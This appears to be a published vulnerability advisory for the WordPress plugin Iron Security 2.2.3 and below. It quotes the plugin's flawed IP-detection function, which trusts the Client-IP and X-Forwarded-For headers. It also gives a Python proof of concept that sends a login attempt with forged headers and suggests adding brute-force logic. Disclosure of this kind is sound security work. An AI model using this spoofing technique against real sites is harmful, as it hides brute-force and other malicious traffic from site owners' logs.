WordPress Iron Security 2.2.3 IP Spoofing

# Wordpress Plugin Iron Security - IP Spoofing
    # Exploit Author: bRpsd | cy[at]live.no
    # Date: March 20, 2025
    # Product: https://wordpress.org/plugins/iron-security/
    # Version: 2.2.3 and below
    # CVE : N/A
    
    Summary:
    Iron Security is the ultimate WordPress security plugin built to secure and harden your website with essential protection features. Whether you’re a blogger, business owner, or developer, Iron Security helps keep your site safe from attacks and unauthorized access. with a user-friendly interface and effective tools like custom login URL, HTTP security headers, Iron Security is the all-in-one solution for WordPress security.
    
    
    The script logs successful/fail attempts of logins along with other actions made by users into a log table in database, within the logged data is the IP. However it uses a weak logic of grabbing IP making it easier to evade and not detect the original IP but rather a spoofed one.
    
    PHP function logic:
    ==========================================================================================
    private static function get_client_ip() {
        $ip = '0.0.0.0';
        
        // Check for shared internet/ISP IP
        if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        }
        // Check for IPs passing through proxies
        elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            // Check if multiple IPs
            $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            foreach ($ips as $ip_address) {
                $ip_address = trim($ip_address);
                if (self::validate_ip($ip_address)) {
                    $ip = $ip_address;
                    break;
                }
            }
        }
        // Check for the remote address
        elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        
        return $ip;
    }
    ==========================================================================================
    
    
    Risk:
    The plugin retrieves client IP addresses from potentially untrusted headers such as X-Forwarded-For & Client-IP, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. Below is a simple example of a python code that does a failed login attempt with a spoofed IP that will get logged in database & system due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval.
    
    
    
    
    =======
    POC
    =======
    
    import requests
    
    # Target URL for login [can be other functions that get logged as well]
    url = "http://localhost/wordpress/wp-login.php"
    
    # Spoofed IP address
    spoofed_ip = "1.1.1.1"
    
    # In this example we used a failed login, in a real scenario a brute force logic can be here
    username = "test"
    password = "test"
    
    # Headers with spoofed IP
    headers = {
        "User-Agent": "Mozilla/5.0",
        "X-Forwarded-For": spoofed_ip,
        "Client-IP": spoofed_ip
    }
    
    # Login data
    data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1"
    }
    
    # Send the login request
    response = requests.post(url, headers=headers, data=data)
    
    # Check the response
    print("Status Code:", response.status_code)